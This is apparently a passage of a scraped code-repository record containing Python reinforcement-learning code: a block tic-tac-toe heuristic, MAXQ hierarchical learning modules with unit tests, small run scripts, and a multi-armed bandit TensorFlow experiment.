check_win_block(self, temp_board, blocks_available, flag):\n for k in blocks_available:\n board_x, board_y = 4*k[0], 4*k[1]\n for i in range(4):\n count_plyr , empty = 0, 0\n for j in range(4):\n if temp_board.board_status[board_x + i][board_y + j] == flag:\n count_plyr +=1\n elif temp_board.board_status[board_x + i][board_y + j] == '-':\n empty, tent_x, tent_y = 1, board_x + i, board_y + j\n if count_plyr == 3 and empty == 1:\n return (tent_x, tent_y)\n\n for i in range(4):\n count_plyr , empty = 0, 0\n for j in range(4):\n if temp_board.board_status[board_x + j][board_y + i] == flag:\n count_plyr +=1\n elif temp_board.board_status[board_x + j][board_y + i] == '-':\n empty, tent_x, tent_y = 1, board_x + j, board_y + i\n if count_plyr == 3 and empty == 1:\n return (tent_x, tent_y)\n\n #DIAMOND1\n count_plyr , empty = 0, 0\n\n if temp_board.board_status[board_x + 1][board_y + 0] == flag:\n count_plyr +=1\n\n elif temp_board.board_status[board_x + 1][board_y + 0] == '-':\n empty, tent_x, tent_y = 1, board_x + 1, board_y + 0\n\n if temp_board.board_status[board_x + 0][board_y + 1] == flag:\n count_plyr +=1\n elif temp_board.board_status[board_x + 0][board_y + 1] == '-':\n empty, tent_x, tent_y = 1, board_x + 0, board_y + 1\n\n if temp_board.board_status[board_x + 2][board_y + 1] == flag:\n count_plyr +=1\n elif temp_board.board_status[board_x + 2][board_y + 1] == '-':\n empty, tent_x, tent_y = 1, board_x + 2, board_y + 1\n\n if temp_board.board_status[board_x + 1][board_y + 2] == flag:\n count_plyr +=1\n elif temp_board.board_status[board_x + 1][board_y + 2] == '-':\n empty, tent_x, tent_y = 1, board_x + 1, board_y + 2\n\n if count_plyr == 3 and empty == 1:\n return (tent_x, tent_y)\n\n\n #DIAMOND2\n count_plyr , empty = 0, 0\n\n if temp_board.board_status[board_x + 1][board_y + 1] == flag:\n count_plyr +=1\n elif temp_board.board_status[board_x + 1][board_y + 1] == '-':\n empty, tent_x, tent_y = 1, board_x + 1, board_y + 1\n\n if temp_board.board_status[board_x + 0][board_y + 2] == flag:\n count_plyr +=1\n elif temp_board.board_status[board_x + 0][board_y + 2] == '-':\n empty, tent_x, tent_y = 1, board_x + 0, board_y + 2\n\n if temp_board.board_status[board_x + 2][board_y + 2] == flag:\n count_plyr +=1\n elif temp_board.board_status[board_x + 2][board_y + 2] == '-':\n empty, tent_x, tent_y = 1, board_x + 2, board_y + 2\n\n if temp_board.board_status[board_x + 1][board_y + 3] == flag:\n count_plyr +=1\n elif temp_board.board_status[board_x + 1][board_y + 3] == '-':\n empty, tent_x, tent_y = 1, board_x + 1, board_y + 3\n\n if count_plyr == 3 and empty == 1:\n return (tent_x, tent_y)\n\n #DIAMOND3\n count_plyr , empty = 0, 0\n\n if temp_board.board_status[board_x + 2][board_y + 0] == flag:\n count_plyr +=1\n elif temp_board.board_status[board_x + 2][board_y + 0] == '-':\n empty, tent_x, tent_y = 1, board_x + 2, board_y + 0\n\n if temp_board.board_status[board_x + 1][board_y + 1] == flag:\n count_plyr +=1\n elif temp_board.board_status[board_x + 1][board_y + 1] == '-':\n empty, tent_x, tent_y = 1, board_x + 1, board_y + 1\n\n if temp_board.board_status[board_x + 3][board_y + 1] == flag:\n count_plyr += 1\n elif temp_board.board_status[board_x + 3][board_y + 1] == '-':\n empty, tent_x, tent_y = 1, board_x + 3, board_y + 1\n\n if temp_board.board_status[board_x + 2][board_y + 2] == flag:\n count_plyr +=1\n elif temp_board.board_status[board_x + 2][board_y + 2] == '-':\n empty, tent_x, tent_y = 1, board_x + 2, board_y + 2\n\n if count_plyr == 3 and empty == 1:\n return (tent_x, tent_y)\n\n #DIAMOND4\n count_plyr , empty = 0, 0\n\n if temp_board.board_status[board_x + 2][board_y + 1] == flag:\n count_plyr +=1\n elif temp_board.board_status[board_x + 2][board_y + 1] == '-':\n empty, tent_x, tent_y = 1, board_x + 2, board_y + 1\n\n if temp_board.board_status[board_x + 1][board_y + 2] == flag:\n count_plyr +=1\n elif temp_board.board_status[board_x + 1][board_y + 2] == '-':\n empty, tent_x, tent_y = 1, board_x + 1, board_y + 2\n\n if temp_board.board_status[board_x + 3][board_y + 2] == flag:\n count_plyr +=1\n elif temp_board.board_status[board_x + 3][board_y + 2] == '-':\n empty, tent_x, tent_y = 1, board_x + 3, board_y + 2\n\n if temp_board.board_status[board_x + 2][board_y + 3] == flag:\n count_plyr +=1\n elif temp_board.board_status[board_x + 2][board_y + 3] == '-':\n empty, tent_x, tent_y = 1, board_x + 2, board_y + 3\n\n if count_plyr == 3 and empty == 1:\n return (tent_x, tent_y)\n\n return (-1, -1)\n\n\n def utility_get(self, board, player_flag, opp_flag):\n gain = 0\n utility_values_block = []\n for i in range(16):\n utility_values_block.append(0)\n\n for i in range(16):\n utility_values_block[i] = self.calc_utility(board, i, player_flag, opp_flag)/1000.0\n\n #DIAMOND1\n p, pos, neg = 0, 0, 0\n p += utility_values_block[4]\n if board.block_status[1][0] == player_flag:\n pos = pos + 1\n elif board.block_status[1][0] == opp_flag:\n neg = neg + 1\n\n p += utility_values_block[1]\n if board.block_status[0][1] == player_flag:\n pos = pos + 1\n elif board.block_status[0][1] == opp_flag:\n neg = neg + 1\n\n p += utility_values_block[9]\n if board.block_status[2][1] == player_flag:\n pos = pos + 1\n elif board.block_status[2][1] == opp_flag:\n neg = neg + 1\n\n p += utility_values_block[6]\n if board.block_status[1][2] == player_flag:\n pos = pos + 1\n elif board.block_status[1][2] == opp_flag:\n neg = neg + 1\n\n gain = gain + (10 * self.utility_matrix[5*pos+neg]) + self.calc_imp(p)\n\n #DIAMOND2\n p, pos, neg = 0, 0, 0\n\n p += utility_values_block[5]\n if board.block_status[1][1] == player_flag:\n pos = pos + 1\n elif board.block_status[1][1] == opp_flag:\n neg = neg + 1\n\n p += utility_values_block[2]\n if board.block_status[0][2] == player_flag:\n pos = pos + 1\n elif board.block_status[0][2] == opp_flag:\n neg = neg + 1\n\n p += utility_values_block[10]\n if board.block_status[2][2] == player_flag:\n pos = pos + 1\n elif board.block_status[2][2] == opp_flag:\n neg = neg + 1\n\n p += utility_values_block[7]\n if board.block_status[1][3] == player_flag:\n pos = pos + 1\n elif board.block_status[1][3] == opp_flag:\n neg = neg + 1\n\n gain = gain + (10 * self.utility_matrix[5*pos+neg]) + self.calc_imp(p)\n\n #DIAMOND3\n p, pos, neg = 0, 0, 0\n\n p += utility_values_block[8]\n if board.block_status[2][0] == player_flag:\n pos = pos + 1\n elif board.block_status[2][0] == opp_flag:\n neg = neg + 1\n\n p += utility_values_block[5]\n if board.block_status[1][1] == player_flag:\n pos = pos + 1\n elif board.block_status[1][1] == opp_flag:\n neg = neg + 1\n\n p += utility_values_block[13]\n if board.block_status[3][1] == player_flag:\n pos = pos + 1\n elif board.block_status[3][1] == opp_flag:\n neg = neg + 1\n\n p += utility_values_block[10]\n if board.block_status[2][2] == player_flag:\n pos = pos + 1\n elif board.block_status[2][2] == opp_flag:\n neg = neg + 1\n\n gain = gain + (10 * self.utility_matrix[5*pos+neg]) + self.calc_imp(p)\n\n #DIAMOND4\n p, pos, neg = 0, 0, 0\n\n p += utility_values_block[9]\n if board.block_status[2][1] == player_flag:\n pos = pos + 1\n elif board.block_status[2][1] == opp_flag:\n neg = neg + 1\n\n p += utility_values_block[6]\n if board.block_status[1][2] == player_flag:\n pos = pos + 1\n elif board.block_status[1][2] == opp_flag:\n neg = neg + 1\n\n p += utility_values_block[14]\n if board.block_status[3][2] == player_flag:\n pos = pos + 1\n elif board.block_status[3][2] == opp_flag:\n neg = neg + 1\n\n p += utility_values_block[11]\n if board.block_status[2][3] == player_flag:\n pos = pos + 1\n elif board.block_status[2][3] == opp_flag:\n neg = neg + 1\n\n gain = gain + (10 * self.utility_matrix[5*pos+neg]) + self.calc_imp(p)\n\n for i in range(4):\n p, pos, neg = 0, 0, 0\n for j in range(4):\n p += utility_values_block[j*4+i]\n if board.block_status[j][i] == player_flag:\n pos = pos + 1\n elif board.block_status[j][i] == opp_flag:\n neg = neg + 1\n gain = gain + (10 * self.utility_matrix[5*pos+neg]) + self.calc_imp(p)\n\n for i in range(4):\n p, pos, neg = 0, 0, 0\n for j in range(4):\n p += utility_values_block[i*4+j]\n if board.block_status[i][j] == player_flag:\n pos = pos + 1\n elif board.block_status[i][j] == opp_flag:\n neg = neg + 1\n gain = gain + (10 * self.utility_matrix[5*pos+neg]) + self.calc_imp(p)\n\n count_plyr_block = count_opp_block = 0\n val1, val2 = 50 , 20\n\n for i in range(4):\n for j in range(4):\n if board.block_status[i][j] == player_flag:\n count_plyr_block += 1\n elif board.block_status[i][j] == opp_flag:\n count_opp_block += 1\n\n if count_opp_block > self.count_opp and count_plyr_block < self.count_plyr:\n gain-=val1\n\n elif (count_plyr_block - self.count_plyr) < (count_opp_block - self.count_opp) and count_plyr_block > self.count_plyr:\n gain-=val2\n\n elif count_opp_block == self.count_opp and self.count_plyr < count_plyr_block:\n gain+=val1\n\n return gain\n\n\n def calc_utility(self, board, board_num, player_flag, opp_flag):\n gain , board_x, board_y = 0, (board_num/4)*4, (board_num%4)*4\n\n for i in range(board_x, board_x + 4):\n pos, neg = 0, 0\n for j in range(board_y, board_y + 4):\n if board.board_status[i][j] == opp_flag:\n neg = neg + 1\n elif board.board_status[i][j] == player_flag:\n pos = pos + 1\n gain += self.utility_matrix[5*pos+neg]\n\n for j in range(board_y, board_y + 4):\n pos, neg = 0, 0\n for i in range(board_x, board_x + 4):\n if board.board_status[i][j] == opp_flag:\n neg = neg + 1\n elif board.board_status[i][j] == player_flag:\n pos = pos + 1\n gain += self.utility_matrix[5*pos+neg]\n\n #DIAMOND1\n pos, neg = 0, 0\n\n if board.board_status[board_x + 1][board_y + 0] == player_flag:\n pos = pos + 1\n elif board.board_status[board_x + 1][board_y + 0] == opp_flag:\n neg = neg + 1\n\n if board.board_status[board_x + 0][board_y + 1] == player_flag:\n pos = pos + 1\n elif board.board_status[board_x + 0][board_y + 1] == opp_flag:\n neg = neg + 1\n\n if board.board_status[board_x + 2][board_y + 1] == player_flag:\n pos = pos + 1\n elif board.board_status[board_x + 2][board_y + 1] == opp_flag:\n neg = neg + 1\n\n if board.board_status[board_x + 1][board_y + 2] == player_flag:\n pos = pos + 1\n elif board.board_status[board_x + 1][board_y + 2] == opp_flag:\n neg = neg + 1\n\n gain += self.utility_matrix[5*pos+neg]\n\n\n #DIAMOND2\n pos, neg = 0, 0\n\n if board.board_status[board_x + 1][board_y + 1] == player_flag:\n pos = pos + 1\n elif board.board_status[board_x + 1][board_y + 1] == opp_flag:\n neg = neg + 1\n\n if board.board_status[board_x + 0][board_y + 2] == player_flag:\n pos = pos + 1\n elif board.board_status[board_x + 0][board_y + 2] == opp_flag:\n neg = neg + 1\n\n if board.board_status[board_x + 2][board_y + 2] == player_flag:\n pos = pos + 1\n elif board.board_status[board_x + 2][board_y + 2] == opp_flag:\n neg = neg + 1\n\n if board.board_status[board_x + 1][board_y + 3] == player_flag:\n pos = pos + 1\n elif board.board_status[board_x + 1][board_y + 3] == opp_flag:\n neg = neg + 1\n\n gain += self.utility_matrix[5*pos+neg]\n\n\n #DIAMOND3\n pos, neg = 0, 0\n\n if board.board_status[board_x + 2][board_y + 0] == player_flag:\n pos = pos + 1\n elif board.board_status[board_x + 2][board_y + 0] == opp_flag:\n neg = neg + 1\n\n if board.board_status[board_x + 1][board_y + 1] == player_flag:\n pos = pos + 1\n elif board.board_status[board_x + 1][board_y + 1] == opp_flag:\n neg = neg + 1\n\n if board.board_status[board_x + 3][board_y + 1] == player_flag:\n pos = pos + 1\n elif board.board_status[board_x + 3][board_y + 1] == opp_flag:\n neg = neg + 1\n\n if board.board_status[board_x + 2][board_y + 2] == player_flag:\n pos = pos + 1\n elif board.board_status[board_x + 2][board_y + 2] == opp_flag:\n neg = neg + 1\n\n gain += self.utility_matrix[5*pos+neg]\n\n #DIAMOND4\n pos, neg = 0, 0\n\n if board.board_status[board_x + 2][board_y + 1] == player_flag:\n pos = pos + 1\n elif board.board_status[board_x + 2][board_y + 1] == opp_flag:\n neg = neg + 1\n\n if board.board_status[board_x + 1][board_y + 2] == player_flag:\n pos = pos + 1\n elif board.board_status[board_x + 1][board_y + 2] == opp_flag:\n neg = neg + 1\n\n if board.board_status[board_x + 3][board_y + 2] == player_flag:\n pos = pos + 1\n elif board.board_status[board_x + 3][board_y + 2] == opp_flag:\n neg = neg + 1\n\n if board.board_status[board_x + 2][board_y + 3] == player_flag:\n pos = pos + 1\n elif board.board_status[board_x + 2][board_y + 3] == opp_flag:\n neg = neg + 1\n\n gain += self.utility_matrix[5*pos+neg]\n\n plyr_flag = player_flag\n op_flag = 'o' if player_flag == 'x' else 'x'\n i, j, tempx, tempy = 0, 0, 0, 0\n\n hor, ver = [], []\n for p in range(4):\n temp_hor = []\n for q in range(4):\n temp_hor.append([p,q])\n hor.append(temp_hor)\n\n for q in range(4):\n temp_ver = []\n for p in range(4):\n temp_ver.append([p,q])\n ver.append(temp_ver)\n lim = 10\n\n for hor_line in hor:\n count_plyr_hor, count_opp_hor, count_plyr_ver, count_opp_ver = 0, 0, 0, 0\n for ver_line in ver:\n count_plyr_hor, count_opp_hor, count_plyr_ver, count_opp_ver = 0, 0, 0, 0\n\n for var in ver_line:\n if plyr_flag == board.board_status[board_x+var[0]][board_y+var[1]]:\n count_plyr_ver+=1\n elif op_flag == board.board_status[board_x+var[0]][board_y+var[1]]:\n count_opp_ver+=1\n y_cord = var[1]\n\n for var in hor_line:\n if plyr_flag == board.board_status[board_x+var[0]][board_y+var[1]]:\n count_plyr_hor+=1\n elif op_flag == board.board_status[board_x+var[0]][board_y+var[1]]:\n count_opp_hor+=1\n x_cord = var[0]\n\n a, b = board_x+x_cord, board_y+y_cord\n\n if board.board_status[a][b] == plyr_flag and count_plyr_hor == 3 and count_opp_ver == 2 and count_plyr_ver == 0 and count_opp_hor == 0:\n gain += lim\n\n if board.board_status[a][b] == plyr_flag and count_opp_hor == 2 and count_plyr_ver == 3 and count_opp_ver == 0 and count_plyr_hor == 0:\n gain += lim\n\n return gain\n\n def calc_imp(self, util):\n limit1, limit2 = 4, -4\n for i in range(-4,-1):\n if (util >= i and util < i+1):\n factr = pow(10, abs(i)-2)\n ret = (util-i-1)*9*factr - factr\n\n for i in range(1,4):\n if (util >= i and util < i+1):\n factr = pow(10, abs(i)-1)\n ret = (util-i)*9*factr + factr\n\n if abs(util) < 1 or util == -1:\n ret = util\n\n if util < limit2:\n factr = pow(10,3)\n ret = (util-limit2)*9*factr - factr\n\n if util >= limit1:\n factr = pow(10,3)\n ret = (util-limit1)*9*factr + factr\n\n return ret\n" } ]
1
vladhc/rl-book
https://github.com/vladhc/rl-book
dffecdcaa0c9757807b5c2e48558b16e3ef862f4
070fba244a4ce46f9b39f0e112af66c7a4fc47bc
ca8ec1648207e4b88f97a2b85f9d56ffc1aafd41
refs/heads/master
2020-04-23T17:56:16.904357
2019-03-27T21:44:14
2019-03-27T21:44:14
171,349,590
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6486486196517944, "alphanum_fraction": 0.6486486196517944, "avg_line_length": 6.400000095367432, "blob_id": "50889187308b36a8edbf8b96039ad89c733dddad", "content_id": "e908cea08c808083d0541d8e6014ba5135494793", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 37, "license_type": "no_license", "max_line_length": 14, "num_lines": 5, "path": "/hierarchical-with-maxq-decomposition/run.sh", "repo_name": "vladhc/rl-book", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nset -eu\n\npython main.py\n" }, { "alpha_fraction": 0.6596638560295105, "alphanum_fraction": 0.7142857313156128, "avg_line_length": 20.636363983154297, "blob_id": "f7aa780f0959f4bff7485371f5cfa20f9ba8686a", "content_id": "347290d1756a2188890f568eda80521e1247c2ad", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 238, "license_type": "no_license", "max_line_length": 53, "num_lines": 11, "path": "/ch2-multi-armed-bandits/run.sh", "repo_name": "vladhc/rl-book", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nset -eux\n\nrm -rf output_dir\n\npython main.py --epsilon 0.00 ./output_dir/epsilon_0\npython main.py --epsilon 0.01 ./output_dir/epsilon_01\npython main.py --epsilon 0.1 ./output_dir/epsilon_10\n\ntensorboard --logdir ./output_dir\n" }, { "alpha_fraction": 0.4725111424922943, "alphanum_fraction": 0.5156017541885376, "avg_line_length": 29.590909957885742, "blob_id": "adccde8ba9d7cfecb901b23d2a5b2bd53b221a8c", "content_id": "e436885ab5ee55c64da61aa002151e84bb285c7d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 677, "license_type": "no_license", "max_line_length": 62, "num_lines": 22, "path": "/hierarchical-with-maxq-decomposition/rl/tests/test_graph.py", "repo_name": "vladhc/rl-book", "src_encoding": "UTF-8", "text": "from unittest import TestCase\nimport rl\n\nclass TestGraph(TestCase):\n\n def testValueCompositeAction(self):\n bottom = rl.Task(\"↓\", 0)\n right = rl.Task(\"→\", 0)\n root = rl.Task(\"root\", term_predicate=lambda x: False)\n root += bottom\n root += right\n graph = rl.Graph(root)\n\n graph.set_v(bottom, (0, 0), -1)\n graph.set_v(right, (0, 0), -100)\n graph.set_c(root, (0, 0), bottom, 0.3)\n\n # V = Q(root, state, best_action(s))\n # best_action((0, 0)) = bottom\n # V = V(bottom, (0, 0)) + C(root, (0,0), bottom)\n # V = -1 + 0.3 = -0.7\n self.assertEqual(graph.get_v(root, (0, 0)), -0.7)\n" }, { "alpha_fraction": 0.7878788113594055, "alphanum_fraction": 0.7878788113594055, "avg_line_length": 48.5, "blob_id": "cc35b7fe33d34b5a98298b910d7ba97fe922350a", "content_id": "da98f943c6bcc1e68a9d9afc77173ff00b339ef2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 99, "license_type": "no_license", "max_line_length": 67, "num_lines": 2, "path": "/hierarchical-with-maxq-decomposition/taxi/__init__.py", "repo_name": "vladhc/rl-book", "src_encoding": "UTF-8", "text": "from .evaluate import evaluate\nfrom .evaluate import print_best_actions, print_q, print_c, print_v\n" }, { "alpha_fraction": 0.5060483813285828, "alphanum_fraction": 0.5262096524238586, "avg_line_length": 22.619047164916992, "blob_id": "d87cdb28c07d2591f549a7433f9ea0f14e8c77b7", "content_id": "4b5d123179cd02f3cc458a00897468b102dd9f21", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 496, "license_type": "no_license", "max_line_length": 84, "num_lines": 21, "path": "/ch2-multi-armed-bandits/run-optimistic-initial.sh", "repo_name": "vladhc/rl-book", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nset -eux\n\nrm -rf output_dir\n\nSTEPS=50\nARMS=10\n\npython main.py --steps $STEPS \\\n --arms $ARMS \\\n --epsilon 0.1 \\\n --init_q 0 \\\n --optimizer recency_weighted ./output_dir/recency_weighted\npython main.py --steps $STEPS \\\n --arms $ARMS \\\n --epsilon 0.1 \\\n --init_q 5 \\\n --optimizer recency_weighted ./output_dir/recency_weighted_optimistic\n\ntensorboard --logdir ./output_dir\n" }, { "alpha_fraction": 0.5635359287261963, "alphanum_fraction": 0.5643251538276672, "avg_line_length": 24.85714340209961, "blob_id": "6e5ad694099fec46154bf0021d6735196881fe32", "content_id": "26a86912f306bcb3f7438b00ee1bcaae0d2d365a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1267, "license_type": "no_license", "max_line_length": 69, "num_lines": 49, "path": "/hierarchical-with-maxq-decomposition/rl/task.py", "repo_name": "vladhc/rl-book", "src_encoding": "UTF-8", "text": "class Task:\n\n def __init__(\n self,\n name,\n primitive_action=None,\n params=None,\n state_tr=lambda state: state,\n term_predicate=lambda state: True):\n self.name = name\n\n # For the composite actions\n self._actions = []\n self._params = params\n self._state_tr = state_tr\n self._term_predicate = term_predicate\n\n # For the primitive actions\n self._primitive_action = primitive_action\n\n def __iadd__(self, action):\n self._actions.append(action)\n return self\n\n def get(self, name, params=None):\n for action in self._actions:\n if action.name == name and action.get_params() == params:\n return action\n\n def get_params(self):\n return self._params\n\n def transform_state(self, state):\n return self._state_tr(state)\n\n def is_primitive(self):\n return len(self._actions) == 0\n\n def get_primitive(self):\n return self._primitive_action\n\n def get_actions(self):\n return self._actions\n\n def is_done(self, state):\n if self.is_primitive():\n return True\n state = self.transform_state(state)\n return self._term_predicate(state)\n" }, { "alpha_fraction": 0.5642135739326477, "alphanum_fraction": 0.5707070827484131, "avg_line_length": 26.176469802856445, "blob_id": "970dc2ec495e326843d1d266dea2088f41b925c8", "content_id": "205dbc70f65641a2a2ac2013e487647fa5e933e8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1386, "license_type": "no_license", "max_line_length": 82, "num_lines": 51, "path": "/hierarchical-with-maxq-decomposition/rl/policy.py", "repo_name": "vladhc/rl-book", "src_encoding": "UTF-8", "text": "import numpy as np\n\n\ndef get_action(graph, stack, state, epsilon=0.0):\n while True:\n assert len(stack) > 0\n task, params, *_ = stack[-1]\n if task.is_done(state):\n stack.pop()\n else:\n break\n while True:\n task, *_ = stack[-1]\n if task.is_primitive():\n break\n # Evaluate next action\n next_task = _policy(graph, task, state, epsilon)\n stack.append((next_task, 0, state))\n action, *_ = stack[-1] # Primitive action\n\n # increase tick of every action on stack\n for i in range(len(stack)):\n task, ticks, state = stack[i]\n ticks += 1\n stack[i] = (task, ticks, state)\n\n return action.get_primitive(), stack\n\n\ndef print_stack(stack):\n for i, record in enumerate(stack):\n action, ticks, _ = record\n print(\"{}. {}({}): {}\".format(i, action.name, action.get_params(), ticks))\n\n\ndef _policy(graph, task, state, epsilon):\n best_action = graph.get_best_action(task, state)\n if np.random.uniform() > epsilon:\n return best_action\n\n actions = filter(\n lambda a: a.is_primitive() or not a.is_done(state),\n task.get_actions())\n actions = list(actions)\n actions.remove(best_action)\n\n if len(actions) == 0:\n return best_action\n\n rand_idx = np.random.choice(len(actions))\n return actions[rand_idx]\n" }, { "alpha_fraction": 0.4357026517391205, "alphanum_fraction": 0.4845360815525055, "avg_line_length": 29.71666717529297, "blob_id": "74ecdb3c07e360de73f2b7d7d98fede25ca4c10d", "content_id": "1ad8f3c9dfd44b7366d7112b0c05677bb94d4ab3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1847, "license_type": "no_license", "max_line_length": 66, "num_lines": 60, "path": "/hierarchical-with-maxq-decomposition/rl/tests/test_optimizer.py", "repo_name": "vladhc/rl-book", "src_encoding": "UTF-8", "text": "from unittest import TestCase\nimport rl\n\n\nclass TestOptimizer(TestCase):\n\n def testPrimitiveAction(self):\n a = rl.Task(\"↓\", 0)\n root = rl.Task(\"root\", term_predicate=lambda x: False)\n root += a\n graph = rl.Graph(root)\n\n optimizer = rl.Optimizer(graph, learning_rate=0.5)\n state = (0, 0)\n next_state = (0, 1)\n\n for v in [-0.5, -0.75, -0.875]:\n stack = [\n (root, 1, state),\n (a, 1, state),\n ]\n optimizer.optimize(stack, next_state, False)\n self.assertEqual(graph.get_v(a, state), v)\n\n def testCompositeAction(self):\n down = rl.Task(\"↓\", 0)\n root = rl.Task(\"root\")\n root += down\n graph = rl.Graph(root)\n\n optimizer = rl.Optimizer(\n graph,\n learning_rate=0.75,\n discount_factor=1.0)\n state0 = (0, 0)\n state = (0, 3)\n next_state = (0, 4)\n\n graph.set_v(down, state, -1.0)\n graph.set_v(down, next_state, -0.25)\n graph.set_c(root, state, down, 1.0)\n graph.set_c(root, next_state, down, 2.0)\n\n stack = [\n (root, 4, state0),\n (down, 1, state),\n ]\n\n optimizer.optimize(stack, next_state, False)\n\n # Parent task is finished => V of the primitive action:\n # target = 0.0 => 0.25 * -1.0 + 0.75 * 0.0 = -0.25\n self.assertEqual(graph.get_v(down, state), -0.25)\n\n # target C(root, state, down) = V(root, next_state) =\n # = Q(root, next_state, down) =\n # = V(down, next_state) + C(root, next_state, down) =\n # = -0.25 + 2.0 = 1.75\n # C(root, state, down) = 0.25 * 1.0 + 0.75 * 1.75 = 1.5625\n self.assertEqual(graph.get_c(root, state, down), 1.5625)\n" }, { "alpha_fraction": 0.8055555820465088, "alphanum_fraction": 0.8055555820465088, "avg_line_length": 35, "blob_id": "9620254bdd68712b9231db33cf5c645db506c199", "content_id": "cf1f845e5670abaf0491e2406ab283684038e209", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 144, "license_type": "no_license", "max_line_length": 43, "num_lines": 4, "path": "/hierarchical-with-maxq-decomposition/rl/__init__.py", "repo_name": "vladhc/rl-book", "src_encoding": "UTF-8", "text": "from .task import Task\nfrom .graph import get_default_graph, Graph\nfrom .policy import get_action, print_stack\nfrom .optimizer import Optimizer\n" }, { "alpha_fraction": 0.6023502945899963, "alphanum_fraction": 0.6031084060668945, "avg_line_length": 31.567901611328125, "blob_id": "87d98144148b2e8d84f6353c45617659d00f4deb", "content_id": "4fa92a6322353dde8d058a49bda1abdd12e08a93", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2642, "license_type": "no_license", "max_line_length": 95, "num_lines": 81, "path": "/hierarchical-with-maxq-decomposition/rl/graph.py", "repo_name": "vladhc/rl-book", "src_encoding": "UTF-8", "text": "from .task import Task\nfrom collections import defaultdict\n\n\nclass Graph:\n\n def __init__(self, root):\n self._v = defaultdict(float) # (primitiveAction, state) → value\n self._c = defaultdict(float) # (action, state, subAction) → completition\n self._root = root\n self._prev_default_graph = None\n\n def root(self):\n return self._root\n\n def __enter__(self):\n global _default_graph\n self._prev_default_graph = _default_graph\n _default_graph = self\n return self\n\n def __exit__(self, exc_type, exc_value, traceback):\n global _default_graph\n _default_graph = self._prev_default_graph\n\n def get_v(self, action, state):\n if action.is_primitive():\n state_tr = action.transform_state(state)\n return self._v[(action.name, state_tr)]\n best_action = self.get_best_action(action, state)\n return self.get_q(action, state, best_action)\n\n def get_q(self, action, state, child_action):\n c = self.get_c(action, state, child_action)\n v = self.get_v(child_action, state)\n return v + c\n\n def set_v(self, action, state, v):\n assert action.is_primitive()\n state_tr = action.transform_state(state)\n self._v[(action.name, state_tr)] = v\n\n def get_c(self, parent_action, state, action):\n assert isinstance(parent_action, Task)\n assert isinstance(action, Task)\n assert parent_action.get_actions().index(action) != -1\n state_tr = action.transform_state(state)\n return self._c[(parent_action.name, state_tr, action.name)]\n\n def set_c(self, parent_action, state, action, c):\n assert isinstance(parent_action, Task)\n assert isinstance(action, Task)\n assert parent_action.get_actions().index(action) != -1\n state_tr = action.transform_state(state)\n self._c[(parent_action.name, state_tr, action.name)] = c\n\n def get_best_action(self, parent_action, state):\n assert not parent_action.is_primitive()\n best_action = None\n best_v = -float('inf')\n\n actions = filter(\n lambda a: a.is_primitive() or not a.is_done(state),\n parent_action.get_actions())\n\n for action in actions:\n v = self.get_q(parent_action, state, action)\n if v > best_v:\n best_action = action\n best_v = v\n\n assert best_action is not None, \"No best action for task {}\".format(parent_action.name)\n return best_action\n\n\n_default_graph = None\n\n\ndef get_default_graph():\n global _default_graph\n return _default_graph\n" }, { "alpha_fraction": 0.5286320447921753, "alphanum_fraction": 0.5360551476478577, "avg_line_length": 32.88024139404297, "blob_id": "bde6b9d98d3c58f1d89d4ef55072cbc29700859e", "content_id": "019b4c43f3d08fa54049ea7613db605686a8acf8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5658, "license_type": "no_license", "max_line_length": 83, "num_lines": 167, "path": "/ch2-multi-armed-bandits/main.py", "repo_name": "vladhc/rl-book", "src_encoding": "UTF-8", "text": "import numpy as np\nimport tensorflow as tf\nimport argparse\n\n\ndef create_graph(params, delta_graph):\n tf.reset_default_graph()\n\n arms_count = params.arms\n games_count = params.games\n shape = (games_count, arms_count)\n\n q = tf.get_variable(\n 'q',\n shape,\n initializer=tf.initializers.random_normal)\n q_estimated = tf.Variable(\n np.ones(shape, dtype=np.float32) * params.init_q,\n name='q_estimated')\n n = tf.get_variable(\n 'n',\n shape,\n dtype=tf.int32,\n initializer=tf.ones_initializer)\n\n with tf.variable_scope('action_selection'):\n greedy_action = tf.argmax(\n q_estimated,\n axis=1,\n name='greedy_action',\n output_type=tf.int32)\n random_action = tf.random_uniform(\n shape=(games_count,),\n maxval=arms_count,\n dtype=tf.int32,\n name='random_action')\n epsilon = tf.constant(params.epsilon, name='epsilon')\n selected_action = tf.where(\n tf.random_uniform(shape=(games_count,), maxval=1.0) < epsilon,\n random_action,\n greedy_action,\n name='selected_action')\n\n mask = tf.one_hot(selected_action,\n depth=arms_count,\n dtype=tf.float32,\n name='mask')\n\n with tf.variable_scope('reward'):\n reward = (tf.random_normal(shape) + q) * mask\n\n with tf.variable_scope('update_q'):\n error = reward - q_estimated * mask\n inc_n = tf.assign_add(\n n,\n tf.cast(mask, tf.int32),\n name='increment_n')\n inc_n = tf.cast(inc_n, tf.float32)\n delta = delta_graph(params, error, inc_n)\n train_op = tf.assign_add(\n q_estimated,\n delta,\n name='update_q_estimated')\n\n with tf.variable_scope('stat'):\n # Optimal action ratio\n optimal_action = tf.argmax(\n q,\n axis=1,\n output_type=tf.int32,\n name='optimal_action')\n is_optimal_action = tf.equal(selected_action, optimal_action)\n optimal_action_ratio = tf.reduce_mean(\n tf.cast(is_optimal_action, tf.float32))\n tf.summary.scalar('optimal_action_ratio', optimal_action_ratio)\n\n # Average reward\n avg_reward = tf.reduce_mean(tf.reduce_sum(reward, axis=1))\n tf.summary.scalar('avg_reward', avg_reward)\n\n # True error\n true_error = tf.reduce_sum((q_estimated - q) * mask, axis=1)\n tf.summary.histogram('true_error', 